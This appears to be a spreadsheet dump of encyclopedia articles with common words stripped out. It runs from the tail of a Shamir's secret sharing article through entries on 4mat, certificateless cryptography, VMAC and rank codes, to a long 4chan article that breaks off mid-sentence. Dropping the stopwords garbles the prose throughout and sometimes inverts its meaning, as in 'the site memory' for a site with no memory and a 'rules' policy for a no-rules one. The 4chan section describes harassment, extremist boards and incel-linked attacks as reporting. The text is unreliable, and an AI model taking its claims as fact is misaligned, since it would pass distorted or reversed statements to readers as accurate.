{\frac {x-x_{2}}{x_{0}-x_{2}}}={\frac {x-4}{2-4}}\cdot {\frac {x-5}{2-5}}={\frac {1}{6}}x^{2}-{\frac {3}{2}}x+{\frac {10}{3}}\,\!} {\displaystyle \ell _{1}(x)={\frac {x-x_{0}}{x_{1}-x_{0}}}\cdot {\frac {x-x_{2}}{x_{1}-x_{2}}}={\frac {x-2}{4-2}}\cdot {\frac {x-5}{4-5}}=-{\frac {1}{2}}x^{2}+{\frac {7}{2}}x-5\,\!} {\displaystyle \ell _{2}(x)={\frac {x-x_{0}}{x_{2}-x_{0}}}\cdot {\frac {x-x_{1}}{x_{2}-x_{1}}}={\frac {x-2}{5-2}}\cdot {\frac {x-4}{5-4}}={\frac {1}{3}}x^{2}-2x+{\frac {8}{3}}\,\!} using formula polynomial interpolation, {\displaystyle f(x)} 1942 3402 4414 1234 {\displaystyle {\begin{aligned}f(x)&amp;=\sum _{j=0}^{2}y_{j}\cdot \ell _{j}(x)\\[6pt]&amp;=y_{0}\ell _{0}(x)+y_{1}\ell _{1}(x)+y_{2}\ell _{2}(x)\\[6pt]&amp;=1942\left({\frac {1}{6}}x^{2}-{\frac {3}{2}}x+{\frac {10}{3}}\right)+3402\left(-{\frac {1}{2}}x^{2}+{\frac {7}{2}}x-5\right)+4414\left({\frac {1}{3}}x^{2}-2x+{\frac {8}{3}}\right)\\[6pt]&amp;=1234+166x+94x^{2}\end{aligned}}} recalling secret free coefficient, means 1234 {\displaystyle s=1234\,\!} done. computationally efficient approach using polynomial interpolation find coefficient source polynomial {\displaystyle s=f(0)} using lagrange polynomials efficient, since unused constants calculated. considering this, optimized formula lagrange polynomials find {\displaystyle f(0)} defined follows: {\displaystyle f(0)=\sum _{j=0}^{k-1}y_{j}\prod _{\begin{smallmatrix}m\,=\,0\\m\,\neq \,j\end{smallmatrix}}^{k-1}{\frac {x_{m}}{x_{m}-x_{j}}}} problem although simplified version method demonstrated above, uses integer arithmetic rather finite field arithmetic, works, security problem: gains information {\displaystyle every {\displaystyle d_{i}} finds. suppose finds points 1494 {\displaystyle d_{0}=(1,1494)} 1942 {\displaystyle d_{1}=(2,1942)} still {\displaystyle k=3} points, theory gained information {\displaystyle could combine information points public information: {\displaystyle n=6,k=3,f(x)=a_{0}+a_{1}x+\cdots +a_{k-1}x^{k-1},a_{0}=s,a_{i}\in \mathbb doing could perform following algebra: fill formula {\displaystyle f(x)} {\displaystyle value {\displaystyle k:f(x)=s+a_{1}x+\cdots +a_{3-1}x^{3-1}\rightarrow {}f(x)=s+a_{1}x+a_{2}x^{2}} fill values {\displaystyle d_{0}} {\displaystyle 1494 1494 {\displaystyle f(x):1494=s+a_{1}1+a_{2}1^{2}\rightarrow {}1494=s+a_{1}+a_{2}} fill values {\displaystyle d_{1}} {\displaystyle 1942 1942 {\displaystyle f(x):1942=s+a_{1}2+a_{2}2^{2}\rightarrow {}1942=s+2a_{1}+4a_{2}} subtract (3)-(2): 1942 1494 {\displaystyle (1942-1494)=(s-s)+(2a_{1}-a_{1})+(4a_{2}-a_{2})\rightarrow {}448=a_{1}+3a_{2}} rewrite {\displaystyle a_{1}=448-3a_{2}} knows {\displaystyle a_{2}\in \mathbb starts replacing {\displaystyle a_{2}} find possible values {\displaystyle a_{1}} {\displaystyle a_{2}=0\rightarrow {}a_{1}=448-3\times 0=448} {\displaystyle a_{2}=1\rightarrow {}a_{1}=448-3\times 1=445} {\displaystyle a_{2}=2\rightarrow {}a_{1}=448-3\times 2=442} {\displaystyle \,\,\,\,\,\,\,\,\,\vdots {\displaystyle a_{2}=148\rightarrow {}a_{1}=448-3\times 148=4} {\displaystyle a_{2}=149\rightarrow {}a_{1}=448-3\times 149=1} after checking {\displaystyle a_{2}=149} stops would negative values {\displaystyle a_{1}} larger values {\displaystyle a_{2}} (which impossible {\displaystyle a_{1}\in \mathbb conclude {\displaystyle a_{2}\in [0,1,\dots ,148,149]} now, replace {\displaystyle a_{1}} (2): 1494 1046 {\displaystyle 1494=s+(448-3a_{2})+a_{2}\rightarrow {}s=1046+2a_{2}} now, replacing {\displaystyle a_{2}} values found (5), gets 1046 1046 1046 1046 {\displaystyle s\in [1046+2\times 0,1046+2\times 1,\dots ,1046+2\times 148,1046+2\times 149]} leads information: 1046 1048 1342 1344 {\displaystyle s\in [1046,1048,\dots ,1342,1344].} numbers guess instead infinite quantity natural numbers. solution geometrically attack exploits fact order polynomial known thus gives information paths polynomial take known points. this reduces possible values unknown points since points must smooth curve, polynomial must coefficients natural numbers. this problem fixed using finite field arithmetic. field size {\displaystyle p\in \mathbb :p&gt;s,p&gt;n} used. figure shows polynomial curve finite field. contrast smooth curve appears disorganised disjointed. practice small change. prime {\displaystyle must chosen bigger number participants every {\displaystyle a_{i}} (including {\displaystyle a_{0}=s} points polynomial must also calculated {\displaystyle (x,f(x){\bmod {p}})} instead {\displaystyle (x,f(x))} everybody receives point must also know value {\displaystyle considered publicly known. therefore, select value {\displaystyle prevent attacks somebody guesses every possible value {\displaystyle example, choose 1613 {\displaystyle p=1613} polynomial becomes 1234 1613 {\displaystyle f(x)=1234+166x+94x^{2}{\bmod {1613}}} gives points: 1494 1188 {\displaystyle (1,1494);(2,329);(3,965);(4,176);(5,1188);(6,775)} this time gain information finds {\displaystyle d_{x}} (until {\displaystyle points). suppose finds 1494 {\displaystyle d_{0}=\left(1,1494\right)} {\displaystyle d_{1}=\left(2,329\right)} public information 1613 {\displaystyle n=6,k=3,p=1613,f(x)=a_{0}+a_{1}x+\dots +a_{k-1}x^{k-1}\mod {p},a_{0}=s,a_{i}\in \mathbb attempting previous attack, can: fill {\displaystyle f(x)} -formula {\displaystyle value {\displaystyle {\displaystyle 1613 1613 {\displaystyle f(x)=s+a_{1}x+\dots +a_{3-1}x^{3-1}\mod 1613\rightarrow {}f(x)=s+a_{1}x+a_{2}x^{2}-1613m_{x}:m_{x}\in \mathbb fill values {\displaystyle d_{0}} {\displaystyle 1494 1613 1494 1613 {\displaystyle f(x):1494=s+a_{1}1+a_{2}1^{2}-1613m_{1}\rightarrow {}1494=s+a_{1}+a_{2}-1613m_{1}} fill values {\displaystyle d_{1}} {\displaystyle 1942 1613 1942 1613 {\displaystyle f(x):1942=s+a_{1}2+a_{2}2^{2}-1613m_{2}\rightarrow {}1942=s+2a_{1}+4a_{2}-1613m_{2}} subtracts (3)-(2): 1942 1494 1613 1613 1613 {\displaystyle (1942-1494)=(s-s)+(2a_{1}-a_{1})+(4a_{2}-a_{2})+(1613m_{1}-1613m_{2})\rightarrow {}448=a_{1}+3a_{2}+1613(m_{1}-m_{2})} rewrites 1613 {\displaystyle a_{1}=448-3a_{2}-1613(m_{1}-m_{2})} using {\displaystyle a_{2}\in \mathbb starts replacing {\displaystyle a_{2}} find possible values {\displaystyle a_{1}} 1613 1613 {\displaystyle a_{2}=0\rightarrow {}a_{1}=448-3\times 0-1613(m_{1}-m_{2})=448-1613(m_{1}-m_{2})} 1613 1613 {\displaystyle a_{2}=1\rightarrow {}a_{1}=448-3\times 1-1613(m_{1}-m_{2})=445-1613(m_{1}-m_{2})} 1613 1613 {\displaystyle a_{2}=2\rightarrow {}a_{1}=448-3\times 2-1613(m_{1}-m_{2})=442-1613(m_{1}-m_{2})} {\displaystyle \,\,\,\,\,\,\,\,\,\vdots this time able stop {\displaystyle (m_{1}-m_{2})} could integer modulo {\displaystyle (even negative {\displaystyle m_{2}&gt;m_{1}} {\displaystyle possible values {\displaystyle a_{1}} knows {\displaystyle [448,445,442,\ldots always decreases 1613 {\displaystyle 1613} divisible {\displaystyle could conclude {\displaystyle a_{1}\in [1,4,7,\ldots however, {\displaystyle prime conclude this. thus, using finite field avoids possible attack. python example properties some useful properties shamir's {\displaystyle \left(k,n\right)\,\!} threshold scheme are: secure: scheme information theoretic security. minimal: size piece exceed size original data. extensible: when {\displaystyle k\,\!} kept fixed, shares {\displaystyle d_{i}\,\!} dynamically added deleted without affecting pieces, computing points polynomial affect currently computed points. dynamic: security easily enhanced without changing secret, changing polynomial occasionally (keeping free term) constructing shares participants. flexible: organizations hierarchy important, participant assigned different numbers shares according importance inside organization. instance, president could unlock safe alone, whereas secretaries would required combine shares unlock safe.a known issue shamir's secret sharing scheme verification correctness retrieved shares reconstruction process, known verifiable secret sharing. verifiable secret sharing aims verify shareholders honest submitting fake shares. also secret sharing lagrange polynomial homomorphic secret sharing simplistic decentralized voting protocol. two-man rule partial password references dawson, donovan, (1994), "the breadth shamir's secret-sharing scheme", computers security, 69–78, doi:10.1016/0167-4048(94)90097-3.benzekki, (2017), verifiable secret sharing approach secure multicloud storage", ubiquitous networking, lecture notes computer science, casablanca: springer, 10542: 225–234, doi:10.1007/978-3-319-68179-5_20, isbn 978-3-319-68178-8. external links shamir's secret sharing crypto++ library shamir's secret sharing scheme (ssss) implementation sharedsecret implementation online shamir's secret sharing tool utilizing hashicorp's shamir secret sharing algorithm</t>
  </si>
  <si>
    <t>4mat</t>
  </si>
  <si>
    <t>matthew simmonds, also known 4mat 4-mat, british electronic musician, sound designer, video game composer best known chiptunes written tracker software. began career demoscene early 1990s composing amiga. discography demo scene l.f.f., theme music skid row's cracktro lemmings (1991) albums decades (2010) surrender (2011) legacy trails (2011) extras (2011) origins (2012) rips (2012) guru (2012) sans titre (2012) closure (2012) nadir (2014) modern closure (2019) starfields (2010) video game credits 4mat credited following games: references external links official website 4mat archive</t>
  </si>
  <si>
    <t>Certificateless cryptography</t>
  </si>
  <si>
    <t>certificateless cryptography variant id-based cryptography intended prevent escrow problem. ordinarily, keys generated certificate authority generation center (kgc) given complete power implicitly trusted. prevent complete breakdown system case compromised kgc, generation process split user. first generates pair, private partial private system. remainder random value generated user, never revealed anyone, even kgc. cryptographic operations user performed using complete private involves kgc's partial key, user's random secret value. disadvantage identity information longer forms entire public key. meaning, user's public discoverable user's identity string kgc's public key. thus, user's public must published otherwise obtained users. advantage system, possible verify obtained public belongs stated identity string. words, method distributing user's public secure.) identity string kgc's public used verify obtained public belongs identity string. verified obtained public generated identity string, kgc's private unknown value). note multiple public private pairs generated identity string, attackers would access kgc's private creation process. encrypt message another user, three pieces information needed: recipient's public identity string, also kgc's public information (public key). identity string kgc's public used verify recipient's public belongs recipient (was generated identity string kgc's public key). decrypt, user needs private key. tight security, certificateless system prove security types adversaries. type adversary- refers third party fake user's public keys, corresponding obtaining user's random secret value. type adversary- refers compromised malicious kgc, access partial public private keys users. also certificate-less authenticated encryption references sattam al-riyami kenneth paterson, certificateless public cryptography, lecture notes computer science, 473, 2003 [1].</t>
  </si>
  <si>
    <t>VMAC</t>
  </si>
  <si>
    <t>vmac block cipher-based message authentication code (mac) algorithm using universal hash proposed krovetz april 2007. algorithm designed high performance backed formal analysis.vmac designed exceptional performance software 64-bit architectures still performing well 32-bit architectures. measured speeds fast one-half cycle byte (cpb) 64-bit architectures, five desktop 32-bit processors, around embedded 32-bit architectures. closely related variant vmac optimized 32-bit architectures given umac. overview vmac style wegman carter. fast "universal" hash function used hash input message short string. this short string combined addition pseudorandom pad, resulting vmac tag. security depends sender receiver sharing randomly chosen secret hash function pseudorandom pad. this achieved using keyed hash function pseudorandom function generated performing computation hk1(m) fk2(nonce) secret random keys shared sender receiver, nonce value changes generated tag. receiver needs know nonce used sender, method synchronizing nonces needs used. this done explicitly sending nonce along message tag, agreeing upon non-repeating value sequence number. nonce need kept secret, care needs taken ensure that, lifetime vmac key, different nonce used message. vmac uses function, called vhash (also specified document), keyed hash function uses pseudorandom function whose default implementation uses block cipher. vmac allows lengths 64-bit multiple block size block cipher use. when using aes, means vmac produce 128-bit tags. theory wegman-carter macs analysis vmac show "instantiates" vmac truly random keys pads probability attacker (even computationally unbounded one) produces correct messages choosing less 1/260 1/2120 tags length bits, respectively. when attacker makes forgery attempts probability getting tags right increases linearly less n/260 n/2120. applied implementation vmac, using produce keys pads, forgery probabilities increase small amount related security aes. long secure, small additive term insignificant practical attack. specification details. analysis vmac security carried authors krovetz. implementations python references external links vmac: message authentication code using universal hashing internet draft vmac home page cryptolounge vmac wiki entry</t>
  </si>
  <si>
    <t>Rank error-correcting code</t>
  </si>
  <si>
    <t>coding theory, rank codes (also called gabidulin codes) non-binary linear error-correcting codes hamming rank metric. they described systematic building codes could detect correct multiple random rank errors. adding redundancy coding k-symbol word n-symbol word, rank code correct errors rank code distance. erasure code, correct known erasures. rank code algebraic linear code finite field {\displaystyle gf(q^{n})} similar reed–solomon code. rank vector {\displaystyle gf(q^{n})} maximum number linearly independent components {\displaystyle gf(q)} rank distance vectors {\displaystyle gf(q^{n})} rank difference vectors. rank code corrects errors rank error vector greater rank metric {\displaystyle x^{n}} n-dimensional vector space finite field {\displaystyle gf\left({q^{n}}\right)} {\displaystyle power prime {\displaystyle positive integer. {\displaystyle \left(u_{1},u_{2},\dots ,u_{n}\right)} {\displaystyle u_{i}\in gf(q^{n})} base {\displaystyle gf\left({q^{n}}\right)} vector space field {\displaystyle gf\left({q}\right)} every element {\displaystyle x_{i}\in gf\left({q^{n}}\right)} represented {\displaystyle x_{i}=a_{1i}u_{1}+a_{2i}u_{2}+\dots +a_{ni}u_{n}} hence, every vector {\displaystyle {\vec {x}}=\left({x_{1},x_{2},\dots ,x_{n}}\right)} {\displaystyle gf\left({q^{n}}\right)} written matrix: {\displaystyle {\vec {x}}=\left\|{\begin{array}{*{20}c}a_{1,1}&amp;a_{1,2}&amp;\ldots &amp;a_{1,n}\\a_{2,1}&amp;a_{2,2}&amp;\ldots &amp;a_{2,n}\\\ldots &amp;\ldots &amp;\ldots &amp;\ldots \\a_{n,1}&amp;a_{n,2}&amp;\ldots &amp;a_{n,n}\end{array}}\right\|} rank vector {\displaystyle {\vec {x}}} field {\displaystyle gf\left({q^{n}}\right)} rank corresponding matrix {\displaystyle a\left({\vec {x}}\right)} field {\displaystyle gf\left({q}\right)} denoted {\displaystyle r\left({{\vec {x}};q}\right)} vectors {\displaystyle {\vec {x}}} space {\displaystyle x^{n}=a_{n}^{n}} {\displaystyle {\vec {x}}\to r\left({\vec {x}};q\right)} defines norm {\displaystyle x^{n}} rank metric: {\displaystyle d\left({{\vec {x}};{\vec {y}}}\right)=r\left({{\vec {x}}-{\vec {y}};q}\right)} rank code {\displaystyle \{x_{1},x_{2},\dots ,x_{n}\}} vectors {\displaystyle x^{n}} called code code distance {\displaystyle d=\min d\left(x_{i},x_{j}\right)} also forms k-dimensional subspace {\displaystyle x^{n}} called linear k)-code distance {\displaystyle such linear rank metric code always satisfies singleton bound {\displaystyle d\leq n-k+1} generating matrix there several known constructions rank codes, maximum rank distance mrd) codes easiest construct known (generalized) gabidulin code, discovered first delsarte (who called singleton system) later gabidulin (and kshevetskiy let's define frobenius power {\displaystyle [i]} element {\displaystyle x\in gf(q^{n})} {\displaystyle x^{[i]}=x^{q^{i\mod n}}.\,} then, every vector {\displaystyle {\vec {g}}=(g_{1},g_{2},\dots ,g_{n}),~g_{i}\in gf(q^{n}),~n\leq linearly independent {\displaystyle gf(q)} defines generating matrix 1)-code. {\displaystyle g=\left\|{\begin{array}{*{20}c}g_{1}&amp;g_{2}&amp;\dots &amp;g_{n}\\g_{1}^{[m]}&amp;g_{2}^{[m]}&amp;\dots &amp;g_{n}^{[m]}\\g_{1}^{[2m]}&amp;g_{2}^{[2m]}&amp;\dots &amp;g_{n}^{[2m]}\\\dots &amp;\dots &amp;\dots &amp;\dots \\g_{1}^{[(k-1)m]}&amp;g_{2}^{[(k-1)m]}&amp;\dots &amp;g_{n}^{[(k-1)m]}\end{array}}\right\|,} {\displaystyle \gcd(m,n)=1} applications there several proposals public-key cryptosystems based rank codes. however, proven insecure (see e.g. journal cryptology, april 2008). rank codes also useful error erasure correction network coding. also linear code reed–solomon error correction berlekamp–massey algorithm network coding notes references gabidulin, ernst (1985), "theory codes maximum rank distance", problems information transmission, (1): 1–12 kshevetskiy, alexander; gabidulin, ernst (4–9 september 2005), "the construction rank codes", proceedings ieee international symposium information theory (isit) 2005: 2105–2108, doi:10.1109/isit.2005.1523717, isbn 978-0-7803-9151-2 gabidulin, ernst pilipchuk, nina (june july 2003), method erasure correction rank codes", proceedings 2003 ieee international symposium information theory: 423, doi:10.1109/isit.2003.1228440, isbn 978-0-7803-7728-8 external links matlab implementation rank–metric codec</t>
  </si>
  <si>
    <t>4chan</t>
  </si>
  <si>
    <t>4chan anonymous english-language imageboard website. launched christopher "moot" poole october 2003, site hosts boards dedicated wide variety topics, anime manga video games, cooking, weapons, television, music, literature, history, fitness, politics, sports, among others. registration available users typically post anonymously. 2022, 4chan receives million unique monthly visitors, approximately half united states.4chan created unofficial english-language counterpart japanese imageboard futaba channel, also known 2chan, first boards created posting images discussion related anime. site described internet subculture, community influential formation popularization prominent internet memes, lolcats, rickrolling, rage comics, wojaks, pepe frog, well hacktivist political movements, anonymous alt-right. 4chan often subject media attention source controversies, including coordination pranks harassment websites internet users, posting illegal offensive content. guardian summarized 4chan community 2008 "lunatic, juvenile (...) brilliant, ridiculous alarming". background majority posting 4chan takes place imageboards, users ability share images create threaded discussions. august 2022, site's homepage lists imageboards flash animation board. most boards rules dedicated specific topic, including anime manga, video games, music, literature, fitness, politics, sports, among others. uniquely, "random" board—also known /b/—enforces particular rules.4chan internet's trafficked imageboard, according angeles times. 4chan's alexa rank march 2022 though high provided users free charge consumes large amount bandwidth; result, financing often problematic. poole acknowledged donations alone could keep site online, turned advertising help make ends meet. however, explicit content hosted 4chan deterred businesses want associated site's content. january 2009, poole signed deal advertising company; february 2009, $20,000 debt, site continuing lose money. 4chan servers moved texas california august 2008, upgraded maximum bandwidth throughput 4chan 100mbit/s 1gbit/s.unlike forums, 4chan registration system, allowing users post anonymously. posting ephemeral, threads receiving recent replies "bumped" respective board threads deleted ones created. nickname used posting, even previously adopted, "anonymous" "moot". place registration, 4chan provided tripcodes optional form authenticating poster's identity. making post without filling "name" field causes posts attributed "anonymous", general understanding 4chan holds anonymous single person collective (hive) users. moderators generally post without name even performing sysop actions. "capcode" used attribute post "anonymous mod", although moderators often post without capcode. 2011 interview nico nico douga, poole explained approximately volunteer moderators active 4chan. 4chan also junior moderation team, called "janitors", delete posts images suggest normal moderation team user, cannot post capcode. revealing oneself janitor grounds immediate dismissal.4chan target occasional denial service attacks. instance, december 2010, 4chan websites went attack, following poole said blog, join ranks mastercard, visa, paypal, al.—an exclusive club!" history site launched 4chan.net october 2003, christopher poole, then-15-year-old student york city using online handle "moot". poole regular participant something awful's subforum "anime death tentacle rape whorehouse" (adtrw), many users familiar japanese imageboard format futaba channel ("2chan.net"). when creating 4chan, poole obtained futaba channel's open source code translated japanese text english using altavista's babel fish online translator. after site's creation, poole invited users adtrw subforum, many dissatisfied site's moderation, visit 4chan, advertised english-language counterpart futaba channel place western fans discuss anime manga. founding, site hosted board: (anime/random).before 2003, several anime-related boards added, including (hentai), (anime/cute), (hentai/alternative), (wallpapers/anime), (yaoi), (anime). additionally, lolicon board created (lolikon), disabled following posting genuine child pornography ultimately deleted october 2004, threats legal action. february 2004, godaddy suspended 4chan.net domain, prompting poole move site current domain 4chan.org. march 2004, poole announced lacked funds month's server bill, able continue operations receiving swarm donations users. june 2004, 4chan experienced weeks downtime paypal suspended 4chan's donations service receiving complaints site's content. following 4chan's return, several non-anime related boards introduced, including (weapons), (auto), (video games). 2008, nine boards created, including sports board /sp/, fashion board /fa/ "japan/general" (the name later changed "otaku culture") board /jp/. point, 4chan's culture altered, moving away "early, childish," humour, evident likes project chanology; trolling underwent so-called "golden age", taking american corporate media. january 2011, poole announced deletion /r9k/ ("robot9000") /new/ (news) boards, saying /new/ become devoted racist discussions, /r9k/ longer served original purpose test implementation xkcd's robot9000 script. during year, /soc/ board created effort reduce number socialization threads /b/. /r9k/ restored october 2011, along /hc/ ("hardcore", previously deleted), /pol/ rebranding /new/) /diy/ board, addition apology poole recalls criticized deletion encyclopedia dramatica realized done same.in 2010, 4chan implemented recaptcha effort thwart spam arising javascript worms. november 2011, 4chan made transition utilizing cloudflare following series ddos attacks. 4chan imageboards rewritten valid html5/css3 2012 effort improve client-side performance. september 2012, 4chan introduced "4chan pass" that, purchased, "allows users bypass typing recaptcha verification posting reporting posts 4chan image boards"; money raised passes towards supporting site. january 2015, poole stepped site's administrator, citing stress controversies gamergate reason departure. september 2015, poole announced hiroyuki nishimura purchased ownership rights 4chan, without disclosing terms acquisition. nishimura former administrator 2channel 1999 2014, website forming basis anonymous posting culture influenced later websites futaba channel 4chan; nishimura lost 2channel's domain seized registrar, watkins, latter alleged financial difficulties. wired later reported japanese manufacturer good smile company, japanese telecommunication dwango, nishimura's company future search brazil helped facilitate nishimura's purchase, anonymous sources telling publication good smile obtained partial ownership website compensation.in october 2016, reported site facing financial difficulties could lead closure radical changes. post titled "winter coming", hiroyuki nishimura said, tried keep 4chan failed. sincerely sorry", citing server costs, infrastructure costs, network fees.on november 2018, announced site would split two, work-safe boards moved domain, 4channel.org, nsfw boards would remain 4chan.org domain. series posts topic, nishimura explained split 4chan blacklisted advertising companies 4channel domain would allow site receive advertisements mainstream providers.in 2020 interview vice media, several current past moderators spoke perceived racist intent behind site's management. they described managing moderator named rapeape attempting site tool alt-right, nishimura "hands-off, leaving moderation site primarily rapeape." neither nishimura rapeape responded allegations. far-right extremism reported public authorities, commentators civil society groups connected, part, 4chan, association arisen 2015. christopher poole poole kept real-life identity hidden revealed july 2008, wall street journal. prior that, used alias "moot".in april 2009, poole voted world's influential person 2008 open internet poll conducted time magazine. results questioned even poll completed, automated voting programs manual ballot stuffing used influence vote. 4chan's interference vote seemed increasingly likely, found reading first letter first candidates poll spelled phrase containing 4chan memes: "marblecake. also, game."on september 2009, poole gave talk 4chan reputation "meme factory" paraflows symposium vienna, austria, part paraflows festival, themed urban hacking. talk, poole mainly attributed anonymous system, lack data retention site ("the site memory.").in april 2010, poole gave evidence trial united states america david kernell government witness. witness, explained terminology used 4chan prosecutor, ranging "op" "lurker". also explained court nature data given part search warrant, including users uniquely identified site audit logs. notable imageboards "random" board, /b/, follows design futaba channel's nijiura board. first board created, described 4chan's popular board, accounting site traffic 2009. gawker's nick douglas summarized board "people shock, entertain, coax free porn other." rules" policy, except bans certain illegal content, child pornography, invasions websites (posting floods disruptive content), under-18 viewing, inherited site-wide rules. invasions" rule added late 2006, users spent summer "invading" habbo hotel. rules" policy also applies actions administrators moderators, means users banned time, reason, including reason all. partially anonymous nature, board moderation always successful—indeed, site's anti-child pornography rule subject jokes /b/. christopher poole told york times, discussion moderation /b/, "the power lies community dictate standards" site staff simply provided framework.the humor /b/'s many users, refer "/b/tards", often incomprehensible newcomers outsiders, characterized intricate inside jokes dark comedy. users often refer other, much outside world, fags. they often referred outsiders trolls, regularly intention "doing lulz", corruption "lol" used denote amusement another's expense. significant amount media coverage response /b/'s culture, characterised adolescent, crude spiteful, publication writing "bad behavior encouraged site's total anonymity absence archive". douglas cited encyclopedia dramatica's definition "the asshole internets [sic]". mattathias schwartz york times likened high-school bathroom stall, obscene telephone party line", baltimore city paper wrote high school internet, collection butterfly knives locker full porn." wired describes "notorious".each post assigned post number. certain post numbers sought large amount posting taking place "get" them. "get" occurs post's number ends special number, 12345678, 22222222, every millionth post. sign 4chan's scaling, according poole, gets lost meaning high post rate resulting occurring every weeks. estimated /b/'s post rate july 2008 150,000–200,000 posts day. /mlp/ /mlp/ 4chan's pony board, dedicated discussion hasbro's little pony franchise, particularly animated television series little pony: friendship magic spin-offs. while discussion show 4chan initially began /co/ (the comics cartoons board), /mlp/ eventually created 2012 discourage proliferation boards. august 2022, accordance 4chan's global rules, pony-related threads images posted /mlp/.first proposed early 2019, pony preservation project "collaborative effort /mlp/ build curate pony datasets" creating applications artificial intelligence. developer popular text-to-speech application 15.ai worked closely pony preservation project. friendship magic voices 15.ai trained large dataset crowdsourced pony preservation project: audio dialogue show related media—including nine seasons friendship magic, 2017 movie, spinoffs, leaks, various content voiced voice actors—were parsed, hand-transcribed, processed remove background noise contributors pony preservation project. according developer, collective efforts constructive criticism pony preservation project integral development 15.ai. /mu/ music board, /mu/, dedicated discussion music artists, albums, genres, instruments. described "4chan's best kept secret" "surprisingly artistic side 4chan", /mu/ used users share music interests similar minds discover "great music would never found otherwise" many moments insightful candor affirm challenge musical tastes. board gained notoriety earnestly focusing upon promoting challenging otherwise obscure music. some common genres discussed /mu/ include shoegaze, experimental hop, witch house, idm, midwest emo, vaporwave, k-pop. there significant overlap user bases /mu/ music site rate your music. board's culture inspired many online music communities meme pages social media emulate /mu/'s posting style.publications pitchfork entertainment weekly noted board played significant role popularizing various music artists, death grips, neutral milk hotel, seat headrest, have nice life. prominent music critic anthony fantano began career /mu/ developed significant following there. some artists, like zeal ardor conrad tao, admitted posting music anonymously /mu/ official release order honest feedback well getting inspired board. particular, zeal ardor said sound, mixes black metal spirituals, came suggestions users. andrew w.k. board's users 2011, causing servers crash increased traffic. death grips seeded various clues /mu/ 2012 then-upcoming albums money store love deep web. rendition "royals" lorde appeared /mu/ 2012 official release, although lorde denied 2014 ever writing board. singer lauren mayberry shared twitter 2015 link thread /mu/ band's song "leave trace" showcase online misogyny looks like. alleged unreleased radiohead song, titled "putting ketchup fridge" "how still", initially reported genuine spin revealed hoax promoted board's users.the board acknowledged sharing rare music recordings unreleased materials, well finding albums thought lost. notable examples include works duster, d&gt;e&gt;a&gt;t&gt;h&gt;m&gt;e&gt;t&gt;a&gt;l panchiko, lights fucked hairy drooling godspeed you! black emperor. this described resembling secret club preservationists obsessed articulation near-dead language". board attracted attention various projects done users. group called pablo collective posted 4-track remix album kanye west's life pablo titled death pablo /mu/, claiming based recurring dream board's users. role-playing game based neutral milk hotel's aeroplane over sea, designed help board's users, received coverage polygon pitchfork. /pol/ /pol/ ("politically incorrect") 4chan's political discussion board. stickied thread front page states board's intended purpose "discussion news, world events, political issues, related topics." /pol/ created october 2011 rebranding 4chan's news board, /new/, deleted january high volume racist discussion.although previously strong left-libertarian contingent 4chan activists, gradual rightward turn 4chan's politics board early-mid 2010s, fundamentalist approach free speech contributing. board quickly attracted posters political persuasion later would described term, alt-right. media sources characterized /pol/ predominantly racist sexist, many posts taking explicitly neo-nazi bent. site's far-reaching culture vitriolic discriminatory content "most closely associated" /pol/, although features predominant alt-right beliefs; /pol/, like boards, prominent dissemination memes, cases, featuring coordination disperse alt-right sentiments. /pol/ "increasingly became synonymous 4chan whole". southern poverty center regards /pol/'s rhetorical style widely emulated white supremacist websites daily stormer; stormer's editor, andrew anglin, concurred. /pol/ screenshots trayvon martin's hacked social media accounts initially posted. board's users started antifeminist, homophobic, transphobic, anti-arab twitter campaigns.many /pol/ users favored donald trump 2016 united states presidential campaign. both trump son, donald trump jr., appeared acknowledge support tweeting /pol/-associated memes. upon successful election, /pol/ moderator embedded pro-trump video board's pages. /r9k/ /r9k/ board implements randall munroe's "robot9000" algorithm, exact reposts permitted. credited origin "greentext" rhetorical style often center around stories social interactions resulting ineptness. 2012, personal confession stories self-loathing, depression, attempted suicide, began supersede /b/-style roleplaying, otaku, video game discussion.it became popular gathering place controversial online incel community. "beta uprising" "beta rebellion" meme, idea taking revenge women, jocks others perceived cause incels' problems, popularized sub-section. gained traction forum following umpqua community college shooting, believed hours prior murders, users encouraged him, 26-year-old perpetrator chris harper-mercer also warned people school, "...in northwest." perpetrator toronto attack referenced 4chan incel rebellion facebook post made prior attack, praising self-identified incel elliot rodger, killer behind 2014 isla vista killings. claims talked harper-mercer rodger reddit 4chan believes part "beta uprising", also posting message 4chan intention attack. /sci/ /sci/ 4chan's science mathematics board. september 2011, anonymous user /sci/ posted question regarding shortest possible watch possible orders episodes anime melancholy haruhi suzumiya nonchronological order. shortly after, anonymous user responded mathematical proof argued viewers would watch least 93,884,313,611 episodes possible orderings. years later, professional mathematicians recognized mathematical proof partial solution superpermutations problem unsolved years. australian mathematician greg egan later published proof inspired proof anonymous 4chan user, recognized significant advances problem. /vp/ /vp/ 4chan's pokémon board. developed members /vp/, pokémon sage upcoming role-playing fangame feature entirely region, plot, cast human characters pokémon creatures.on april 2020, anonymous user leaked source codes pokemon blue yellow, contained references pokémon pink, canceled companion game pokémon yellow. "paranormal" board, /x/, dedicated discussing topics regarding unexplained phenomena, supernatural, non-political conspiracy theories. initially launched january 2005 4chan's general photography board; february 2007, repurposed paranormal-themed board.many earliest creepypastas (internet horror-related legends) created /x/. idea backrooms gained popularity thanks thread created 2019, users asked "post disquieting images feel 'off'." there, first photo depicting backrooms uploaded another user commented first story backrooms, claiming enters backrooms "noclip reality wrong areas". after 4chan post gained fame, several internet users wrote horror stories relating backrooms. many memes created shared across social media, popularizing creepypasta.american model allison harvard first gained notoriety 2005 internet meme board became known creepy chan. known large eyes peculiar interests like fascination blood, photos posted blog widely circulated board. gained mainstream notoriety 2009 2011 appearing america's next model. would visit episodes america's next model would written participated discussions.the foundation, fictional secret organization documented collaborative writing wiki project name, originated 2007, first file, scp-173, posted anonymous user. initially stand-alone short story, many additional files created shortly after; scps copied scp-173's style within fictional universe. stand-alone wiki created january 2008 editthis wiki hosting service display articles. editthis website moderators, ability delete articles. members communicated individual article talk pages board./x/ first place 2015 viral video 11b-x-1371 posted. board also contributed investigating popularizing controversial satan video game. internet culture early internet memes "[a] significant influential element contemporary internet culture", 4chan responsible many early memes site received positive attention association memes. this included herd liek mudkipz" [sic], involved phrase based pokémon generated numerous youtube tribute videos, term hero" [sic] synonym suicide, misspelling myspace online memorial seventh grader mitchell henderson. 4chan websites, satirical encyclopedia dramatica, also contributed development significant amounts leetspeak. lolcat image combining photograph solecistic text intended contribute humour, widely popularized 4chan form weekly post dedicated corresponding theme.in 2005, installment word filter changed "egg" "duck", thus "eggroll" "duckroll", across 4chan bait-and-switch meme users deceitfully linked picture duck wheels. this modified users linking music video rick astley's 